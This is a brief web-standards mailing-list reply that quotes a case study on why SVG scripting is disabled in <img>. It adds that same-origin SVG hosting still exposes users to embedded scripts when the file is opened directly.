On Wed, May 15, 2013 at 9:08 PM, Simon Pieters <[email protected]> wrote: > Case study: <img> was historically not capable of executing script from an > external file. This lead to sites expecting <img> to be safe (e.g. allow > untrusted comments to use <img>). When browsers wanted to support SVG in > <img>, scripting had to be disabled in order to not break the assumption > that <img> is safe.
Further case-in-point: Hosting SVG same-origin is nevertheless still very much a no-no as tricking the user into loading the file directly will expose the user to said scripts. -- http://annevankesteren.nl/
